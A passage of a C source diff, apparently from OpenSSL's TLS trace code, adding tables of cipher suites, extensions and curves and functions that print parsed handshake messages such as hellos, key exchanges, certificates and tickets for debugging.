+    {0xC001, "TLS_ECDH_ECDSA_WITH_NULL_SHA"},
+    {0xC002, "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"},
+    {0xC003, "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC004, "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"},
+    {0xC005, "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"},
+    {0xC006, "TLS_ECDHE_ECDSA_WITH_NULL_SHA"},
+    {0xC007, "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"},
+    {0xC008, "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC009, "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"},
+    {0xC00A, "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"},
+    {0xC00B, "TLS_ECDH_RSA_WITH_NULL_SHA"},
+    {0xC00C, "TLS_ECDH_RSA_WITH_RC4_128_SHA"},
+    {0xC00D, "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC00E, "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"},
+    {0xC00F, "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"},
+    {0xC010, "TLS_ECDHE_RSA_WITH_NULL_SHA"},
+    {0xC011, "TLS_ECDHE_RSA_WITH_RC4_128_SHA"},
+    {0xC012, "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC013, "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"},
+    {0xC014, "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"},
+    {0xC015, "TLS_ECDH_anon_WITH_NULL_SHA"},
+    {0xC016, "TLS_ECDH_anon_WITH_RC4_128_SHA"},
+    {0xC017, "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"},
+    {0xC018, "TLS_ECDH_anon_WITH_AES_128_CBC_SHA"},
+    {0xC019, "TLS_ECDH_anon_WITH_AES_256_CBC_SHA"},
+    {0xC01A, "TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC01B, "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"},
+    {0xC01C, "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"},
+    {0xC01D, "TLS_SRP_SHA_WITH_AES_128_CBC_SHA"},
+    {0xC01E, "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"},
+    {0xC01F, "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"},
+    {0xC020, "TLS_SRP_SHA_WITH_AES_256_CBC_SHA"},
+    {0xC021, "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"},
+    {0xC022, "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"},
+    {0xC023, "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"},
+    {0xC024, "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"},
+    {0xC025, "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"},
+    {0xC026, "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"},
+    {0xC027, "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"},
+    {0xC028, "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"},
+    {0xC029, "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"},
+    {0xC02A, "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"},
+    {0xC02B, "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"},
+    {0xC02C, "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"},
+    {0xC02D, "TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"},
+    {0xC02E, "TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"},
+    {0xC02F, "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"},
+    {0xC030, "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"},
+    {0xC031, "TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"},
+    {0xC032, "TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"},
+    {0xFEFE, "SSL_RSA_FIPS_WITH_DES_CBC_SHA"},
+    {0xFEFF, "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"},
+};
+
+/* Compression methods */
+static ssl_trace_tbl ssl_comp_tbl[] = {
+    {0x0000, "No Compression"},
+    {0x0001, "Zlib Compression"}
+};
+
+/* Extensions */
+static ssl_trace_tbl ssl_exts_tbl[] = {
+    {TLSEXT_TYPE_server_name, "server_name"},
+    {TLSEXT_TYPE_max_fragment_length, "max_fragment_length"},
+    {TLSEXT_TYPE_client_certificate_url, "client_certificate_url"},
+    {TLSEXT_TYPE_trusted_ca_keys, "trusted_ca_keys"},
+    {TLSEXT_TYPE_truncated_hmac, "truncated_hmac"},
+    {TLSEXT_TYPE_status_request, "status_request"},
+    {TLSEXT_TYPE_user_mapping, "user_mapping"},
+    {TLSEXT_TYPE_client_authz, "client_authz"},
+    {TLSEXT_TYPE_server_authz, "server_authz"},
+    {TLSEXT_TYPE_cert_type, "cert_type"},
+    {TLSEXT_TYPE_elliptic_curves, "elliptic_curves"},
+    {TLSEXT_TYPE_ec_point_formats, "ec_point_formats"},
+    {TLSEXT_TYPE_srp, "srp"},
+    {TLSEXT_TYPE_signature_algorithms, "signature_algorithms"},
+    {TLSEXT_TYPE_use_srtp, "use_srtp"},
+    {TLSEXT_TYPE_heartbeat, "heartbeat"},
+    {TLSEXT_TYPE_session_ticket, "session_ticket"},
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    {TLSEXT_TYPE_opaque_prf_input, "opaque_prf_input"},
+# endif
+    {TLSEXT_TYPE_renegotiate, "renegotiate"},
+    {TLSEXT_TYPE_next_proto_neg, "next_proto_neg"},
+    {TLSEXT_TYPE_padding, "padding"}
+};
+
+static ssl_trace_tbl ssl_curve_tbl[] = {
+    {1, "sect163k1 (K-163)"},
+    {2, "sect163r1"},
+    {3, "sect163r2 (B-163)"},
+    {4, "sect193r1"},
+    {5, "sect193r2"},
+    {6, "sect233k1 (K-233)"},
+    {7, "sect233r1 (B-233)"},
+    {8, "sect239k1"},
+    {9, "sect283k1 (K-283)"},
+    {10, "sect283r1 (B-283)"},
+    {11, "sect409k1 (K-409)"},
+    {12, "sect409r1 (B-409)"},
+    {13, "sect571k1 (K-571)"},
+    {14, "sect571r1 (B-571)"},
+    {15, "secp160k1"},
+    {16, "secp160r1"},
+    {17, "secp160r2"},
+    {18, "secp192k1"},
+    {19, "secp192r1 (P-192)"},
+    {20, "secp224k1"},
+    {21, "secp224r1 (P-224)"},
+    {22, "secp256k1"},
+    {23, "secp256r1 (P-256)"},
+    {24, "secp384r1 (P-384)"},
+    {25, "secp521r1 (P-521)"},
+    {26, "brainpoolP256r1"},
+    {27, "brainpoolP384r1"},
+    {28, "brainpoolP512r1"},
+    {0xFF01, "arbitrary_explicit_prime_curves"},
+    {0xFF02, "arbitrary_explicit_char2_curves"}
+};
+
+static ssl_trace_tbl ssl_point_tbl[] = {
+    {0, "uncompressed"},
+    {1, "ansiX962_compressed_prime"},
+    {2, "ansiX962_compressed_char2"}
+};
+
+static ssl_trace_tbl ssl_md_tbl[] = {
+    {0, "none"},
+    {1, "md5"},
+    {2, "sha1"},
+    {3, "sha224"},
+    {4, "sha256"},
+    {5, "sha384"},
+    {6, "sha512"}
+};
+
+static ssl_trace_tbl ssl_sig_tbl[] = {
+    {0, "anonymous"},
+    {1, "rsa"},
+    {2, "dsa"},
+    {3, "ecdsa"}
+};
+
+static ssl_trace_tbl ssl_hb_tbl[] = {
+    {1, "peer_allowed_to_send"},
+    {2, "peer_not_allowed_to_send"}
+};
+
+static ssl_trace_tbl ssl_hb_type_tbl[] = {
+    {1, "heartbeat_request"},
+    {2, "heartbeat_response"}
+};
+
+static ssl_trace_tbl ssl_ctype_tbl[] = {
+    {1, "rsa_sign"},
+    {2, "dss_sign"},
+    {3, "rsa_fixed_dh"},
+    {4, "dss_fixed_dh"},
+    {5, "rsa_ephemeral_dh"},
+    {6, "dss_ephemeral_dh"},
+    {20, "fortezza_dms"},
+    {64, "ecdsa_sign"},
+    {65, "rsa_fixed_ecdh"},
+    {66, "ecdsa_fixed_ecdh"}
+};
+
+static ssl_trace_tbl ssl_crypto_tbl[] = {
+    {TLS1_RT_CRYPTO_PREMASTER, "Premaster Secret"},
+    {TLS1_RT_CRYPTO_CLIENT_RANDOM, "Client Random"},
+    {TLS1_RT_CRYPTO_SERVER_RANDOM, "Server Random"},
+    {TLS1_RT_CRYPTO_MASTER, "Master Secret"},
+    {TLS1_RT_CRYPTO_MAC | TLS1_RT_CRYPTO_WRITE, "Write Mac Secret"},
+    {TLS1_RT_CRYPTO_MAC | TLS1_RT_CRYPTO_READ, "Read Mac Secret"},
+    {TLS1_RT_CRYPTO_KEY | TLS1_RT_CRYPTO_WRITE, "Write Key"},
+    {TLS1_RT_CRYPTO_KEY | TLS1_RT_CRYPTO_READ, "Read Key"},
+    {TLS1_RT_CRYPTO_IV | TLS1_RT_CRYPTO_WRITE, "Write IV"},
+    {TLS1_RT_CRYPTO_IV | TLS1_RT_CRYPTO_READ, "Read IV"},
+    {TLS1_RT_CRYPTO_FIXED_IV | TLS1_RT_CRYPTO_WRITE, "Write IV (fixed part)"},
+    {TLS1_RT_CRYPTO_FIXED_IV | TLS1_RT_CRYPTO_READ, "Read IV (fixed part)"}
+};
+
+static void ssl_print_hex(BIO *bio, int indent, const char *name,
+                          const unsigned char *msg, size_t msglen)
+{
+    size_t i;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "%s (len=%d): ", name, (int)msglen);
+    for (i = 0; i < msglen; i++)
+        BIO_printf(bio, "%02X", msg[i]);
+    BIO_puts(bio, "\n");
+}
+
+static int ssl_print_hexbuf(BIO *bio, int indent,
+                            const char *name, size_t nlen,
+                            const unsigned char **pmsg, size_t *pmsglen)
+{
+    size_t blen;
+    const unsigned char *p = *pmsg;
+    if (*pmsglen < nlen)
+        return 0;
+    blen = p[0];
+    if (nlen > 1)
+        blen = (blen << 8) | p[1];
+    if (*pmsglen < nlen + blen)
+        return 0;
+    p += nlen;
+    ssl_print_hex(bio, indent, name, p, blen);
+    *pmsg += blen + nlen;
+    *pmsglen -= blen + nlen;
+    return 1;
+}
+
+static int ssl_print_version(BIO *bio, int indent, const char *name,
+                             const unsigned char **pmsg, size_t *pmsglen)
+{
+    int vers;
+    if (*pmsglen < 2)
+        return 0;
+    vers = ((*pmsg)[0] << 8) | (*pmsg)[1];
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "%s=0x%x (%s)\n",
+               name, vers, ssl_trace_str(vers, ssl_version_tbl));
+    *pmsg += 2;
+    *pmsglen -= 2;
+    return 1;
+}
+
+static int ssl_print_random(BIO *bio, int indent,
+                            const unsigned char **pmsg, size_t *pmsglen)
+{
+    unsigned int tm;
+    const unsigned char *p = *pmsg;
+    if (*pmsglen < 32)
+        return 0;
+    tm = (p[0] << 24) | (p[1] << 16) | (p[2] << 8) | p[3];
+    p += 4;
+    BIO_indent(bio, indent, 80);
+    BIO_puts(bio, "Random:\n");
+    BIO_indent(bio, indent + 2, 80);
+    BIO_printf(bio, "gmt_unix_time=0x%08X\n", tm);
+    ssl_print_hex(bio, indent + 2, "random_bytes", p, 28);
+    *pmsg += 32;
+    *pmsglen -= 32;
+    return 1;
+}
+
+static int ssl_print_signature(BIO *bio, int indent, SSL *s,
+                               const unsigned char **pmsg, size_t *pmsglen)
+{
+    if (*pmsglen < 2)
+        return 0;
+    if (SSL_USE_SIGALGS(s)) {
+        const unsigned char *p = *pmsg;
+        BIO_indent(bio, indent, 80);
+        BIO_printf(bio, "Signature Algorithm %s+%s (%d+%d)\n",
+                   ssl_trace_str(p[0], ssl_md_tbl),
+                   ssl_trace_str(p[1], ssl_sig_tbl), p[0], p[1]);
+        *pmsg += 2;
+        *pmsglen -= 2;
+    }
+    return ssl_print_hexbuf(bio, indent, "Signature", 2, pmsg, pmsglen);
+}
+
+static int ssl_print_extension(BIO *bio, int indent, int server, int extype,
+                               const unsigned char *ext, size_t extlen)
+{
+    size_t xlen;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "extension_type=%s(%d), length=%d\n",
+               ssl_trace_str(extype, ssl_exts_tbl), extype, (int)extlen);
+    switch (extype) {
+    case TLSEXT_TYPE_ec_point_formats:
+        if (extlen < 1)
+            return 0;
+        xlen = ext[0];
+        if (extlen != xlen + 1)
+            return 0;
+        return ssl_trace_list(bio, indent + 2,
+                              ext + 1, xlen, 1, ssl_point_tbl);
+
+    case TLSEXT_TYPE_elliptic_curves:
+        if (extlen < 2)
+            return 0;
+        xlen = (ext[0] << 8) | ext[1];
+        if (extlen != xlen + 2)
+            return 0;
+        return ssl_trace_list(bio, indent + 2,
+                              ext + 2, xlen, 2, ssl_curve_tbl);
+
+    case TLSEXT_TYPE_signature_algorithms:
+
+        if (extlen < 2)
+            return 0;
+        xlen = (ext[0] << 8) | ext[1];
+        if (extlen != xlen + 2)
+            return 0;
+        if (xlen & 1)
+            return 0;
+        ext += 2;
+        while (xlen > 0) {
+            BIO_indent(bio, indent + 2, 80);
+            BIO_printf(bio, "%s+%s (%d+%d)\n",
+                       ssl_trace_str(ext[0], ssl_md_tbl),
+                       ssl_trace_str(ext[1], ssl_sig_tbl), ext[0], ext[1]);
+            xlen -= 2;
+            ext += 2;
+        }
+        break;
+
+    case TLSEXT_TYPE_renegotiate:
+        if (extlen < 1)
+            return 0;
+        xlen = ext[0];
+        if (xlen + 1 != extlen)
+            return 0;
+        ext++;
+        if (xlen) {
+            if (server) {
+                if (xlen & 1)
+                    return 0;
+                xlen >>= 1;
+            }
+            ssl_print_hex(bio, indent + 4, "client_verify_data", ext, xlen);
+            if (server) {
+                ext += xlen;
+                ssl_print_hex(bio, indent + 4,
+                              "server_verify_data", ext, xlen);
+            }
+        } else {
+            BIO_indent(bio, indent + 4, 80);
+            BIO_puts(bio, "<EMPTY>\n");
+        }
+        break;
+
+    case TLSEXT_TYPE_heartbeat:
+        if (extlen != 1)
+            return 0;
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "HeartbeatMode: %s\n",
+                   ssl_trace_str(ext[0], ssl_hb_tbl));
+        break;
+
+    case TLSEXT_TYPE_session_ticket:
+        if (extlen != 0)
+            ssl_print_hex(bio, indent + 4, "ticket", ext, extlen);
+        break;
+
+    default:
+        BIO_dump_indent(bio, (char *)ext, extlen, indent + 2);
+    }
+    return 1;
+}
+
+static int ssl_print_extensions(BIO *bio, int indent, int server,
+                                const unsigned char *msg, size_t msglen)
+{
+    size_t extslen;
+    BIO_indent(bio, indent, 80);
+    if (msglen == 0) {
+        BIO_puts(bio, "No Extensions\n");
+        return 1;
+    }
+    extslen = (msg[0] << 8) | msg[1];
+    if (extslen != msglen - 2)
+        return 0;
+    msg += 2;
+    msglen = extslen;
+    BIO_printf(bio, "extensions, length = %d\n", (int)msglen);
+    while (msglen > 0) {
+        int extype;
+        size_t extlen;
+        if (msglen < 4)
+            return 0;
+        extype = (msg[0] << 8) | msg[1];
+        extlen = (msg[2] << 8) | msg[3];
+        if (msglen < extlen + 4)
+            return 0;
+        msg += 4;
+        if (!ssl_print_extension(bio, indent + 2, server,
+                                 extype, msg, extlen))
+            return 0;
+        msg += extlen;
+        msglen -= extlen + 4;
+    }
+    return 1;
+}
+
+static int ssl_print_client_hello(BIO *bio, SSL *ssl, int indent,
+                                  const unsigned char *msg, size_t msglen)
+{
+    size_t len;
+    unsigned int cs;
+    if (!ssl_print_version(bio, indent, "client_version", &msg, &msglen))
+        return 0;
+    if (!ssl_print_random(bio, indent, &msg, &msglen))
+        return 0;
+    if (!ssl_print_hexbuf(bio, indent, "session_id", 1, &msg, &msglen))
+        return 0;
+    if (SSL_IS_DTLS(ssl)) {
+        if (!ssl_print_hexbuf(bio, indent, "cookie", 1, &msg, &msglen))
+            return 0;
+    }
+    if (msglen < 2)
+        return 0;
+    len = (msg[0] << 8) | msg[1];
+    msg += 2;
+    msglen -= 2;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "cipher_suites (len=%d)\n", (int)len);
+    if (msglen < len || len & 1)
+        return 0;
+    while (len > 0) {
+        cs = (msg[0] << 8) | msg[1];
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "{0x%02X, 0x%02X} %s\n",
+                   msg[0], msg[1], ssl_trace_str(cs, ssl_ciphers_tbl));
+        msg += 2;
+        msglen -= 2;
+        len -= 2;
+    }
+    if (msglen < 1)
+        return 0;
+    len = msg[0];
+    msg++;
+    msglen--;
+    if (msglen < len)
+        return 0;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "compression_methods (len=%d)\n", (int)len);
+    while (len > 0) {
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "%s (0x%02X)\n",
+                   ssl_trace_str(msg[0], ssl_comp_tbl), msg[0]);
+        msg++;
+        msglen--;
+        len--;
+    }
+    if (!ssl_print_extensions(bio, indent, 0, msg, msglen))
+        return 0;
+    return 1;
+}
+
+static int dtls_print_hello_vfyrequest(BIO *bio, int indent,
+                                       const unsigned char *msg,
+                                       size_t msglen)
+{
+    if (!ssl_print_version(bio, indent, "server_version", &msg, &msglen))
+        return 0;
+    if (!ssl_print_hexbuf(bio, indent, "cookie", 1, &msg, &msglen))
+        return 0;
+    return 1;
+}
+
+static int ssl_print_server_hello(BIO *bio, int indent,
+                                  const unsigned char *msg, size_t msglen)
+{
+    unsigned int cs;
+    if (!ssl_print_version(bio, indent, "server_version", &msg, &msglen))
+        return 0;
+    if (!ssl_print_random(bio, indent, &msg, &msglen))
+        return 0;
+    if (!ssl_print_hexbuf(bio, indent, "session_id", 1, &msg, &msglen))
+        return 0;
+    if (msglen < 2)
+        return 0;
+    cs = (msg[0] << 8) | msg[1];
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "cipher_suite {0x%02X, 0x%02X} %s\n",
+               msg[0], msg[1], ssl_trace_str(cs, ssl_ciphers_tbl));
+    msg += 2;
+    msglen -= 2;
+    if (msglen < 1)
+        return 0;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "compression_method: %s (0x%02X)\n",
+               ssl_trace_str(msg[0], ssl_comp_tbl), msg[0]);
+    msg++;
+    msglen--;
+    if (!ssl_print_extensions(bio, indent, 1, msg, msglen))
+        return 0;
+    return 1;
+}
+
+static int ssl_get_keyex(const char **pname, SSL *ssl)
+{
+    unsigned long alg_k = ssl->s3->tmp.new_cipher->algorithm_mkey;
+    if (alg_k & SSL_kRSA) {
+        *pname = "rsa";
+        return SSL_kRSA;
+    }
+    if (alg_k & SSL_kDHr) {
+        *pname = "dh_rsa";
+        return SSL_kDHr;
+    }
+    if (alg_k & SSL_kDHd) {
+        *pname = "dh_dss";
+        return SSL_kDHd;
+    }
+    if (alg_k & SSL_kKRB5) {
+        *pname = "krb5";
+        return SSL_kKRB5;
+    }
+    if (alg_k & SSL_kEDH) {
+        *pname = "edh";
+        return SSL_kEDH;
+    }
+    if (alg_k & SSL_kEECDH) {
+        *pname = "EECDH";
+        return SSL_kEECDH;
+    }
+    if (alg_k & SSL_kECDHr) {
+        *pname = "ECDH RSA";
+        return SSL_kECDHr;
+    }
+    if (alg_k & SSL_kECDHe) {
+        *pname = "ECDH ECDSA";
+        return SSL_kECDHe;
+    }
+    if (alg_k & SSL_kPSK) {
+        *pname = "PSK";
+        return SSL_kPSK;
+    }
+    if (alg_k & SSL_kSRP) {
+        *pname = "SRP";
+        return SSL_kSRP;
+    }
+    if (alg_k & SSL_kGOST) {
+        *pname = "GOST";
+        return SSL_kGOST;
+    }
+    *pname = "UNKNOWN";
+    return 0;
+}
+
+static int ssl_print_client_keyex(BIO *bio, int indent, SSL *ssl,
+                                  const unsigned char *msg, size_t msglen)
+{
+    const char *algname;
+    int id;
+    id = ssl_get_keyex(&algname, ssl);
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "KeyExchangeAlgorithm=%s\n", algname);
+    switch (id) {
+
+    case SSL_kRSA:
+        if (TLS1_get_version(ssl) == SSL3_VERSION) {
+            ssl_print_hex(bio, indent + 2,
+                          "EncyptedPreMasterSecret", msg, msglen);
+        } else {
+            if (!ssl_print_hexbuf(bio, indent + 2,
+                                  "EncyptedPreMasterSecret", 2,
+                                  &msg, &msglen))
+                return 0;
+        }
+        break;
+
+        /* Implicit parameters only allowed for static DH */
+    case SSL_kDHd:
+    case SSL_kDHr:
+        if (msglen == 0) {
+            BIO_indent(bio, indent + 2, 80);
+            BIO_puts(bio, "implicit\n");
+            break;
+        }
+    case SSL_kEDH:
+        if (!ssl_print_hexbuf(bio, indent + 2, "dh_Yc", 2, &msg, &msglen))
+            return 0;
+        break;
+
+    case SSL_kECDHr:
+    case SSL_kECDHe:
+        if (msglen == 0) {
+            BIO_indent(bio, indent + 2, 80);
+            BIO_puts(bio, "implicit\n");
+            break;
+        }
+    case SSL_kEECDH:
+        if (!ssl_print_hexbuf(bio, indent + 2, "ecdh_Yc", 1, &msg, &msglen))
+            return 0;
+        break;
+    }
+
+    return 1;
+}
+
+static int ssl_print_server_keyex(BIO *bio, int indent, SSL *ssl,
+                                  const unsigned char *msg, size_t msglen)
+{
+    const char *algname;
+    int id;
+    id = ssl_get_keyex(&algname, ssl);
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "KeyExchangeAlgorithm=%s\n", algname);
+    switch (id) {
+        /* Should never happen */
+    case SSL_kDHd:
+    case SSL_kDHr:
+    case SSL_kECDHr:
+    case SSL_kECDHe:
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "Unexpected Message\n");
+        break;
+
+    case SSL_kRSA:
+
+        if (!ssl_print_hexbuf(bio, indent + 2, "rsa_modulus", 2,
+                              &msg, &msglen))
+            return 0;
+        if (!ssl_print_hexbuf(bio, indent + 2, "rsa_exponent", 2,
+                              &msg, &msglen))
+            return 0;
+        break;
+
+    case SSL_kEDH:
+        if (!ssl_print_hexbuf(bio, indent + 2, "dh_p", 2, &msg, &msglen))
+            return 0;
+        if (!ssl_print_hexbuf(bio, indent + 2, "dh_g", 2, &msg, &msglen))
+            return 0;
+        if (!ssl_print_hexbuf(bio, indent + 2, "dh_Ys", 2, &msg, &msglen))
+            return 0;
+        break;
+
+    case SSL_kEECDH:
+        if (msglen < 1)
+            return 0;
+        BIO_indent(bio, indent + 2, 80);
+        if (msg[0] == EXPLICIT_PRIME_CURVE_TYPE)
+            BIO_puts(bio, "explicit_prime\n");
+        else if (msg[0] == EXPLICIT_CHAR2_CURVE_TYPE)
+            BIO_puts(bio, "explicit_char2\n");
+        else if (msg[0] == NAMED_CURVE_TYPE) {
+            int curve;
+            if (msglen < 3)
+                return 0;
+            curve = (msg[1] << 8) | msg[2];
+            BIO_printf(bio, "named_curve: %s (%d)\n",
+                       ssl_trace_str(curve, ssl_curve_tbl), curve);
+            msg += 3;
+            msglen -= 3;
+            if (!ssl_print_hexbuf(bio, indent + 2, "point", 1, &msg, &msglen))
+                return 0;
+        }
+        break;
+    }
+    return ssl_print_signature(bio, indent, ssl, &msg, &msglen);
+}
+
+static int ssl_print_certificate(BIO *bio, int indent,
+                                 const unsigned char **pmsg, size_t *pmsglen)
+{
+    size_t msglen = *pmsglen;
+    size_t clen;
+    X509 *x;
+    const unsigned char *p = *pmsg, *q;
+    if (msglen < 3)
+        return 0;
+    clen = (p[0] << 16) | (p[1] << 8) | p[2];
+    if (msglen < clen + 3)
+        return 0;
+    q = p + 3;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "ASN.1Cert, length=%d", (int)clen);
+    x = d2i_X509(NULL, &q, clen);
+    if (!x)
+        BIO_puts(bio, "<UNPARSEABLE CERTIFICATE>\n");
+    else {
+        BIO_puts(bio, "\n------details-----\n");
+        X509_print_ex(bio, x, XN_FLAG_ONELINE, 0);
+        PEM_write_bio_X509(bio, x);
+        /* Print certificate stuff */
+        BIO_puts(bio, "------------------\n");
+        X509_free(x);
+    }
+    if (q != p + 3 + clen) {
+        BIO_puts(bio, "<TRAILING GARBAGE AFTER CERTIFICATE>\n");
+    }
+    *pmsg += clen + 3;
+    *pmsglen -= clen + 3;
+    return 1;
+}
+
+static int ssl_print_certificates(BIO *bio, int indent,
+                                  const unsigned char *msg, size_t msglen)
+{
+    size_t clen;
+    if (msglen < 3)
+        return 0;
+    clen = (msg[0] << 16) | (msg[1] << 8) | msg[2];
+    if (msglen != clen + 3)
+        return 0;
+    msg += 3;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "certificate_list, length=%d\n", (int)clen);
+    while (clen > 0) {
+        if (!ssl_print_certificate(bio, indent + 2, &msg, &clen))
+            return 0;
+    }
+    return 1;
+}
+
+static int ssl_print_cert_request(BIO *bio, int indent, SSL *s,
+                                  const unsigned char *msg, size_t msglen)
+{
+    size_t xlen;
+    if (msglen < 1)
+        return 0;
+    xlen = msg[0];
+    if (msglen < xlen + 1)
+        return 0;
+    msg++;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "certificate_types (len=%d)\n", (int)xlen);
+    if (!ssl_trace_list(bio, indent + 2, msg, xlen, 1, ssl_ctype_tbl))
+        return 0;
+    msg += xlen;
+    msglen -= xlen + 1;
+    if (!SSL_USE_SIGALGS(s))
+        goto skip_sig;
+    if (msglen < 2)
+        return 0;
+    xlen = (msg[0] << 8) | msg[1];
+    if (msglen < xlen + 2 || (xlen & 1))
+        return 0;
+    msg += 2;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "signature_algorithms (len=%d)\n", (int)xlen);
+    while (xlen > 0) {
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "%s+%s (%d+%d)\n",
+                   ssl_trace_str(msg[0], ssl_md_tbl),
+                   ssl_trace_str(msg[1], ssl_sig_tbl), msg[0], msg[1]);
+        xlen -= 2;
+        msg += 2;
+    }
+    msg += xlen;
+    msglen -= xlen + 2;
+
+ skip_sig:
+    xlen = (msg[0] << 8) | msg[1];
+    BIO_indent(bio, indent, 80);
+    if (msglen < xlen + 2)
+        return 0;
+    msg += 2;
+    msglen -= 2;
+    BIO_printf(bio, "certificate_authorities (len=%d)\n", (int)xlen);
+    while (xlen > 0) {
+        size_t dlen;
+        X509_NAME *nm;
+        const unsigned char *p;
+        if (xlen < 2)
+            return 0;
+        dlen = (msg[0] << 8) | msg[1];
+        if (xlen < dlen + 2)
+            return 0;
+        msg += 2;
+        BIO_indent(bio, indent + 2, 80);
+        BIO_printf(bio, "DistinguishedName (len=%d): ", (int)dlen);
+        p = msg;
+        nm = d2i_X509_NAME(NULL, &p, dlen);
+        if (!nm) {
+            BIO_puts(bio, "<UNPARSEABLE DN>\n");
+        } else {
+            X509_NAME_print_ex(bio, nm, 0, XN_FLAG_ONELINE);
+            BIO_puts(bio, "\n");
+            X509_NAME_free(nm);
+        }
+        xlen -= dlen + 2;
+        msg += dlen;
+    }
+    return 1;
+}
+
+static int ssl_print_ticket(BIO *bio, int indent,
+                            const unsigned char *msg, size_t msglen)
+{
+    unsigned int tick_life;
+    if (msglen == 0) {
+        BIO_indent(bio, indent + 2, 80);
+        BIO_puts(bio, "No Ticket\n");
+        return 1;
+    }
+    if (msglen < 4)
+        return 0;
+    tick_life = (msg[0] << 24) | (msg[1] << 16) | (msg[2] << 8) | msg[3];
+    msglen -= 4;
+    msg += 4;
+    BIO_indent(bio, indent + 2, 80);
+    BIO_printf(bio, "ticket_lifetime_hint=%u\n", tick_life);
+    if (!ssl_print_hexbuf(bio, indent + 2, "ticket", 2, &msg, &msglen))
+        return 0;
+    if (msglen)
+        return 0;
+    return 1;
+}
+
+static int ssl_print_handshake(BIO *bio, SSL *ssl,
+                               const unsigned char *msg, size_t msglen,
+                               int indent)
+{
+    size_t hlen;
+    unsigned char htype;
+    if (msglen < 4)
+        return 0;
+    htype = msg[0];
+    hlen = (msg[1] << 16) | (msg[2] << 8) | msg[3];
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "%s, Length=%d\n",
+               ssl_trace_str(htype, ssl_handshake_tbl), (int)hlen);
+    msg += 4;
+    msglen -= 4;
+    if (SSL_IS_DTLS(ssl)) {
+        if (msglen < 8)
+            return 0;
+        BIO_indent(bio, indent, 80);
+        BIO_printf(bio, "message_seq=%d, fragment_offset=%d, "
+                   "fragment_length=%d\n",
+                   (msg[0] << 8) | msg[1],
+                   (msg[2] << 16) | (msg[3] << 8) | msg[4],
+                   (msg[5] << 16) | (msg[6] << 8) | msg[7]);
+        msg += 8;
+        msglen -= 8;
+    }
+    if (msglen < hlen)
+        return 0;
+    switch (htype) {
+    case SSL3_MT_CLIENT_HELLO:
+        if (!ssl_print_client_hello(bio, ssl, indent + 2, msg, msglen))
+            return 0;
+        break;
+
+    case DTLS1_MT_HELLO_VERIFY_REQUEST:
+        if (!dtls_print_hello_vfyrequest(bio, indent + 2, msg, msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_SERVER_HELLO:
+        if (!ssl_print_server_hello(bio, indent + 2, msg, msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_SERVER_KEY_EXCHANGE:
+        if (!ssl_print_server_keyex(bio, indent + 2, ssl, msg, msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_CLIENT_KEY_EXCHANGE:
+        if (!ssl_print_client_keyex(bio, indent + 2, ssl, msg, msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_CERTIFICATE:
+        if (!ssl_print_certificates(bio, indent + 2, msg, msglen))
